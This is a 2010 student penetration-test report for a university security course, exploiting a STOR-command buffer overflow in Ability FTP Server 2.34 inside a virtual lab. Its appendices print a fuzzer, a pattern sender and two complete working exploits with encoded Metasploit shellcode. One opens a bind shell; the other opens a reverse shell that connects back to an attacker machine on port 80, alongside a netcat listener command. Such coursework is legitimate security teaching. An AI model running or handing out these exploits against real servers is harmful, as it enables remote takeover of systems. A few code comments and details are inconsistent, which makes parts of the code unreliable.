Faculty of Science

Department of Computing

ITEC855 Security and Forensic Discovery

Penetration test for:

Code-Crafters Ability FTP Server V2.34

Prepared by
(Group 5)
Muhammed BAYKAL 41035127
Guillermo Alfonso Moreno Quijano 41729935

1 | Group 5 – Penetration Test for Ability FTP Server

 Semester 1, 2010

Table of contents

1. Introduction
2. Global Objectives
3. Global Objectives Summary
4. Attack Diagrams
4.1. Attack Flow Diagram (No Firewall Protects the Victim)
4.2. Attack Flow Diagram (Firewall Protects the Victim)

5. Procedure
5.1. Port Scanning to Determine Services Running on Target Machine
5.2. Running Fuzz Application against Ability FTP Server
5.3. Creating Pattern to Determine Exact Memory Crash Locations
5.4. Sending the Pattern to the FTP Server to Determine Where EIP
and ESP are overridden
5.5. Finding the Return Address
5.6. Generating the shell code
A- Bind TCP inline
B- Creating Reverse TCP Inline

6. Appendix
6.1. Fuzzer Code - to find at what point application throws buffer
overflow error.
6.2. Pattern Code to Determine EIP, ESP and EBP Pointers
6.3. ‘Bind TCP Inline’ Shell Code
6.4.’ Reverse TCP’ Shell Code

1. Introduction

2 | Group 5 – Penetration Test for Ability FTP Server

The following penetration test is done with academic purpose. This penetration test was
requested as an assessment of the IT department of the Macquarie University. The assessment
was to be done with no prior internal knowledge of the application.

The objective of the analysis was to simulate an attack to assess the buffer overflow
vulnerability of the Ability FTP server 2.34. This report contains all the steps which led to
gain control over the target machine.

2. Global Objectives
1. Use two machines to simulate one as the victim and another one as the attacker. Both
machines were virtual machines on VMware. The victim machine ran XP windows
operating system and Ability FTP server was installed on it. In addition, the attacker
machine ran Backtrack operating system.

2. Use the command STORE to assess the buffer overflow vulnerability of the Ability
FTP server. This goal is assessed without any firewall protecting the victim.

3. Use the reverse shell to gain control over our victim machine. This goal is assessed
with a firewall protecting the victim.

3. Global Objectives Summary

2.1 Achieved

2.2 Achieved

2.3 Achieved

4. Attack Diagrams

4.1 Attack Flow Diagram (No Firewall Protects the Victim)

3 | Group 5 – Penetration Test for Ability FTP Server

4.2 Attack Flow Diagram (Firewall Protects the Victim)

5. Procedure
Assuming that we do not know anything about victim PC so following steps need to be
completed in order to gain enough knowledge of the target environment.

1. Scan ports on victim machine to determine services running on the machine.

2. Run a fuzz application against the selected application

4 | Group 5 – Penetration Test for Ability FTP Server

 3 Create a Pattern to determine exact memory crash locations
4 Send the pattern to the ftp server to determine where EIP and ESP are overridden.
5. Find the return address
6. Generate the shell codes:
A. Creating bind TCP Inline shell
B. Creating Reverse TCP Inline shell

5.1 Port Scanning to Determine Services Running on Target Machine

Nmap is a powerful port scanning tool and is used to find open ports on the target machine.
Nmap is used along with the following parameters;
A Enables OS detection and Version detection, Script scanning and Trace route

T4 Timing parameter from T0 to T5 higher is faster

F Fast scan mode

As it is shown in the screenshot, Ability Server is running on Port 21 on a machine running

windows XP operating system.

5.2 Running Fuzz Application Against Ability FTP Server

5 | Group 5 – Penetration Test for Ability FTP Server

A fuzzer code is created to send buffers to the victim machine. The buffer size is increased by
100 characters at each transmission step. As a result of fuzz code, it can be detected the break
point of base ESP,EBP and EIP pointers.

Note: refers to Appendix 6.1 to see the script.

The following screenshot shows the result of fuzz code execution with buffer size of 1000
characters on the victim machine.

From the picture above, it is detected that the Ability FTP server crashes with a buffer size of
between 900 and 1000 characters .

5.3 Creating Pattern to Determine Exact Memory Crash Locations

Pattern is a string of unique characters and it can be created by using pattern_create

application which resides under tools folder of framework3.
The length of pattern will be 1000 that number is found from execution of fuzzer code. Please
refer to the following screenshot to see how to generate a pattern.

6 | Group 5 – Penetration Test for Ability FTP Server

5.4 Sending the Pattern to the FTP Server to Determine Where EIP
and ESP are overridden.

Now we need to replace our fuzz code and instead of sending incremental buffer we send the
pattern to the server at once with concatenating STOR command.

Please refer to Appendix 6.2 to see detail of the modified fuzz code. We have got the
following screenshot after execution of the modified fuzz code.

7 | Group 5 – Penetration Test for Ability FTP Server

It can be clearly seen from the picture above that EIP is overridden with the value of
“32674231” and ESP is with “g8Bg................”

We can use pattern offset tool to determine length of buffer which ESP and EIP are
overridden.

Finally, it is known that EIP breaks at 965 and ESP breaks at 985. We need to build a buffer
as following structure;

Buffer = [ "A"*965 + return_address + NOP_slide + shell_code +

NOP_slide ]

5.5 Finding the Return Address

Since we are using ESP break point we need to find memory address of Jump ESP command
from system modules in this assignment we have used SHELL32.dll.

Please refer to the following screenshot to see how we found address of the JMP command.

8 | Group 5 – Penetration Test for Ability FTP Server

As it can be seen the JMP ESP address is 7c9d3of3. Since register address is little endian
architecture, the return address should be formatted as follows before injecting into buffer
code;

Return_Address=”\xf3\x30\x9d\x7c”

5.6 Generating the Shell Code

We need to generate a shell code to send to the victim machine. To generate shell codes we
simply use msfweb console of Metasploit framework.

As it was mention before we want to create 2 shell code s to exploit the ftp server. The bind
TCP inline code will allow the attacker to take control over the victim without any firewall
protecting the victim. The reverse shell code will allow the attacker to take control over the
victim with a firewall protecting the victim

A- Bind TCP inline

Using Metasploit we can generate the bind shell code. Please refer to the following screenshot
to see how to generate the shell code.

9 | Group 5 – Penetration Test for Ability FTP Server

Please refer to appendix 6.3 to see detail of the exploit with BIND TCP Inline payload.

After execution of the bind shell code we connect to the victim machine through netcat. The
following screen was captured after getting access to the machine.

10 | Group 5 – Penetration Test for Ability FTP Server

 B. Creating Reverse TCP Inline shell
The goal of this task is to get access to victim machine when the victim is behind the firewall.
After sending the buffer to the victim machine, the victim will connect back to the attacker
through Port 80.

We will be listening on port 80 with netcat by using the following command;

nc –nvvlp 80

To generate reverse TCP inline shell code we need to use msfweb application of Metasploit
framework please refer to the following screenshot to see details of the shell generation
process.

11 | Group 5 – Penetration Test for Ability FTP Server

After generating the shell code we have embedded the code into the buffer so the exploit will
be executed and finally the victim will connected back to us.

Please see the screenshot below to see the connection from the victim to the attacker using
port 80 in the attacker machine.

12 | Group 5 – Penetration Test for Ability FTP Server

6. Appendix
6.1. Fuzzer Code - to find at what point application throws buffer overflow
error.
#! /usr/bin/python2.5
import os
import socket
import time
buffer=["A"]
counter=100
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(("192.168.0.128",21))
f=s.recv(1024)
print(f)
s.send('USER user\r\n')
f=s.recv(1024)
print(f)
if f[0:3]=="331":
print("User Accepted sending password")
s.send('PASS pass\r\n')
txt=s.recv(1024)
print(txt)
param=txt[0:3]

13 | Group 5 – Penetration Test for Ability FTP Server

 if param=="230":
print("Password Accepted!! Sending Buffer....")
while len(buffer)<=1000:
buffer.append("A"*counter)
counter=counter+10
for string in buffer:
try:
s.send('STOR ' + string+'.txt\r\n' )
dummy=s.recv(1024)
print "Server Response>" + dummy + ' Buffer size: ' + str(len(string))
time.sleep(0.5)
#print("\x1B")
except:
#print("\x1B[2J")
print("Server Crashed at Buffer size :" + str(len(string)))
break
else:
print("Invalid password")
else:
print("Invalid username")

6.2. Pattern Code to Determine EIP, ESP and EBP Pointers

#! /usr/bin/python2.5
import os
import socket
import time
buffer="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3
Ac4Ac5Ac6Ac
7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af
4Af5Af6Af7
Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai
4Ai5Ai6Ai7Ai8A
i9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6A
l7Al8Al9Am0Am1
Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5A
o6Ao7Ao8Ao9Ap0
Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6
Ar7Ar8Ar9As0As1
As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8A
u9Av0Av1Av2Av3Av4
Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9
Ay0Ay1Ay2Ay3Ay4
Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1
Bb2Bb3Bb4Bb5Bb6Bb7
Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4B
e5Be6Be7Be8Be9Bf0
Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B"
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(("192.168.0.128",21))
f=s.recv(1024)
print(f)
s.send('USER user\r\n')
f=s.recv(1024)
print(f)
if f[0:3]=="331":
print("User Accepted sending password")

14 | Group 5 – Penetration Test for Ability FTP Server

s.send('PASS pass\r\n')
txt=s.recv(1024)
print(txt)
param=txt[0:3]
if param=="230":
print("Password Accepted!! Sending Buffer....")
s.send('STOR ' + buffer +'\r\n' )
dummy=s.recv(1024)
time.sleep(1)
else:
print("Invalid password")
else:
print("Invalid username")

6.3. Bind TCP Inline Shell Code

#! /usr/bin/python2.5
#-------------------------------------------------------------
#Revision: 1.0.0 (stable)
#Date : 15/05/2010
#Description :Attack ability ftp server through its STOR command error
# and override EIP and ESP pointers then inject the shell code
# open remote shell screen to gain access to server...
#-------------------------------------------------------------
import os
import socket
import time
from ftplib import FTP
import struct
#-------------------------------------------------------------
# windows/shell_reverse_tcp - 341 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
#LHOST=192.168.0.128, EXITFUNC=seh, LPORT=54321,
#ReverseConnectRetries=5
#-------------------------------------------------------------
shellCode =("\xdb\xc8\xbd\xd6\x26\xe0\xe1\x29\xc9\xb1\x56\xd9\x74\x24\xf4"
"\x5f\x31\x6f\x18\x03\x6f\x18\x83\xc7\xd2\xc4\x15\x1d\x32\x81"
"\xd6\xde\xc2\xf2\x5f\x3b\xf3\x20\x3b\x4f\xa1\xf4\x4f\x1d\x49"
"\x7e\x1d\xb6\xda\xf2\x8a\xb9\x6b\xb8\xec\xf4\x6c\x0c\x31\x5a"
"\xae\x0e\xcd\xa1\xe2\xf0\xec\x69\xf7\xf1\x29\x97\xf7\xa0\xe2"
"\xd3\xa5\x54\x86\xa6\x75\x54\x48\xad\xc5\x2e\xed\x72\xb1\x84"
"\xec\xa2\x69\x92\xa7\x5a\x02\xfc\x17\x5a\xc7\x1e\x6b\x15\x6c"
"\xd4\x1f\xa4\xa4\x24\xdf\x96\x88\xeb\xde\x16\x05\xf5\x27\x90"
"\xf5\x80\x53\xe2\x88\x92\xa7\x98\x56\x16\x3a\x3a\x1d\x80\x9e"
"\xba\xf2\x57\x54\xb0\xbf\x1c\x32\xd5\x3e\xf0\x48\xe1\xcb\xf7"
"\x9e\x63\x8f\xd3\x3a\x2f\x54\x7d\x1a\x95\x3b\x82\x7c\x71\xe4"
"\x26\xf6\x90\xf1\x51\x55\xfd\x36\x6c\x66\xfd\x50\xe7\x15\xcf"
"\xff\x53\xb2\x63\x88\x7d\x45\x83\xa3\x3a\xd9\x7a\x4b\x3b\xf3"
"\xb8\x1f\x6b\x6b\x68\x1f\xe0\x6b\x95\xca\xa7\x3b\x39\xa4\x07"
"\xec\xf9\x14\xe0\xe6\xf5\x4b\x10\x09\xdc\xfa\x16\xc7\x04\xaf"
"\xf0\x2a\xbb\x9b\x30\xa2\x5d\x49\x23\xe2\xf6\xe5\x81\xd1\xce"
"\x92\xfa\x33\x63\x0b\x6d\x0b\x6d\x8b\x92\x8c\xbb\xb8\x3f\x24"
"\x2c\x4a\x2c\xf1\x4d\x4d\x79\x51\x07\x76\xea\x2b\x79\x35\x8a"
"\x2c\x50\xad\x2f\xbe\x3f\x2d\x39\xa3\x97\x7a\x6e\x15\xee\xee"
"\x82\x0c\x58\x0c\x5f\xc8\xa3\x94\x84\x29\x2d\x15\x48\x15\x09"

15 | Group 5 – Penetration Test for Ability FTP Server

"\x05\x94\x96\x15\x71\x48\xc1\xc3\x2f\x2e\xbb\xa5\x99\xf8\x10"
"\x6c\x4d\x7c\x5b\xaf\x0b\x81\xb6\x59\xf3\x30\x6f\x1c\x0c\xfc"
"\xe7\xa8\x75\xe0\x97\x57\xac\xa0\xa6\xa6\x7c\x3d\x3e\x11\x15"
"\x7c\x22\xa2\xc0\x43\x5b\x21\xe0\x3b\x98\x39\x81\x3e\xe4\xfd"
"\x7a\x33\x75\x68\x7c\xe0\x76\xb9")
#-------------------------------------------------------------
#shell32.dll
#JMP ESP => 7C9D30F3 due to little endian
#-------------------------------------------------------------
ret_addr="\xF3\x30\x9D\x7C"
#-------------------------------------------------------------
#Injection will be made based on EIP:965 and ESP:985
# at 955 EIP started to be overridden there r 16 bytes
#I am using JMP ESP since i am using ESP pointer.
#-------------------------------------------------------------
str_buffer=[]
str_buffer.append("STOR ")
str_buffer.append("\x41"*965)
str_buffer.append(ret_addr)
str_buffer.append("\x90"*30)
str_buffer.append(shellCode)
str_buffer.append("\x90"*16)
buffer="".join(str_buffer)
ftp=FTP("192.168.0.128")
try:
print('Sending Server/Credentials..')
ftp.login("user","pass")
except:
print('Server error could not connect to the server' )
print('Connected to the server sending Pattern')
ftp.transfercmd(buffer)
system.exit(0)

6.4. Reverse TCP Shell Code

#! /usr/bin/python2.5
#-------------------------------------------------------------
#Revision: 1.0.1(stable)
#Date : 15/05/2010@23:00
#Description :Attack ability ftp server through its STOR command exploit
# and override EIP and ESP pointers then inject the shell code
# let the victim connects back to my machine from port:80 by bypassing local
# firewall to gain access to server.
#-------------------------------------------------------------
import os
import socket
import time
from ftplib import FTP
import struct
#-------------------------------------------------------------
# windows/shell_reverse_tcp - 341 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# LHOST=192.168.0.100, EXITFUNC=seh, LPORT=80,
# ReverseConnectRetries=5
#-------------------------------------------------------------

16 | Group 5 – Penetration Test for Ability FTP Server

shellCode =("\xbf\x81\xfc\xe5\xdb\x31\xc9\xdb\xde\xb1\x4f\xd9\x74\x24\xf4"
"\x5b\x83\xc3\x04\x31\x7b\x0e\x03\x7b\x0e\x63\x09\x19\x33\xea"
"\xf2\xe2\xc4\x8c\x7b\x07\xf5\x9e\x18\x43\xa4\x2e\x6a\x01\x45"
"\xc5\x3e\xb2\xde\xab\x96\xb5\x57\x01\xc1\xf8\x68\xa4\xcd\x57"
"\xaa\xa7\xb1\xa5\xff\x07\x8b\x65\xf2\x46\xcc\x98\xfd\x1a\x85"
"\xd7\xac\x8a\xa2\xaa\x6c\xab\x64\xa1\xcd\xd3\x01\x76\xb9\x69"
"\x0b\xa7\x12\xe6\x43\x5f\x18\xa0\x73\x5e\xcd\xb3\x48\x29\x7a"
"\x07\x3a\xa8\xaa\x56\xc3\x9a\x92\x34\xfa\x12\x1f\x45\x3a\x94"
"\xc0\x30\x30\xe6\x7d\x42\x83\x94\x59\xc7\x16\x3e\x29\x7f\xf3"
"\xbe\xfe\x19\x70\xcc\x4b\x6e\xde\xd1\x4a\xa3\x54\xed\xc7\x42"
"\xbb\x67\x93\x60\x1f\x23\x47\x09\x06\x89\x26\x36\x58\x75\x96"
"\x92\x12\x94\xc3\xa4\x78\xf1\x20\x9a\x82\x01\x2f\xad\xf1\x33"
"\xf0\x05\x9e\x7f\x79\x83\x59\x7f\x50\x73\xf5\x7e\x5b\x83\xdf"
"\x44\x0f\xd3\x77\x6c\x30\xb8\x87\x91\xe5\x6e\xd8\x3d\x56\xce"
"\x88\xfd\x06\xa6\xc2\xf1\x79\xd6\xec\xdb\x0f\xd1\x7b\x24\xa7"
"\xdd\x1f\xcc\xba\xdd\xdf\x5c\x32\x3b\xb5\x4c\x12\x94\x22\xf4"
"\x3f\x6e\xd2\xf9\x95\xe6\x77\x6b\x72\xf6\xfe\x90\x2d\xa1\x57"
"\x66\x24\x27\x4a\xd1\x9e\x55\x97\x87\xd9\xdd\x4c\x74\xe7\xdc"
"\x01\xc0\xc3\xce\xdf\xc9\x4f\xba\x8f\x9f\x19\x14\x76\x76\xe8"
"\xce\x20\x25\xa2\x86\xb5\x05\x75\xd0\xb9\x43\x03\x3c\x0b\x3a"
"\x52\x43\xa4\xaa\x52\x3c\xd8\x4a\x9c\x97\x58\x74\x6c\x25\x75"
"\xe1\xd7\xdc\x34\x6f\xe8\x0b\x7a\x96\x6b\xb9\x03\x6d\x73\xc8"
"\x06\x29\x33\x21\x7b\x22\xd6\x45\x28\x43\xf3")
#-------------------------------------------------------------
#shell32.dll
#JMP ESP => 7C9D30F3 due to little endian arhitecture reverse the addy
#-------------------------------------------------------------
ret_addr="\xF3\x30\x9D\x7C"
#-------------------------------------------------------------
#Injection will be made based on EIP:965 and ESP:985
# at 955 EIP started to be overridden there r 16 bytes
#I am using JMP ESP since i am using ESP pointer.
#-------------------------------------------------------------
str_buffer=[]
str_buffer.append("STOR ")
str_buffer.append("\x41"*965)
str_buffer.append(ret_addr)
str_buffer.append("\x90"*30)
str_buffer.append(shellCode)
str_buffer.append("\x90"*16)
buffer="".join(str_buffer)
ftp=FTP("192.168.0.128")
try:
print('Sending Server/Credentials..')
ftp.login("user","pass")
except:
print('Server error could not connect to the server' )
print('Connected to the server sending Pattern')
ftp.transfercmd(buffer)

17 | Group 5 – Penetration Test for Ability FTP Server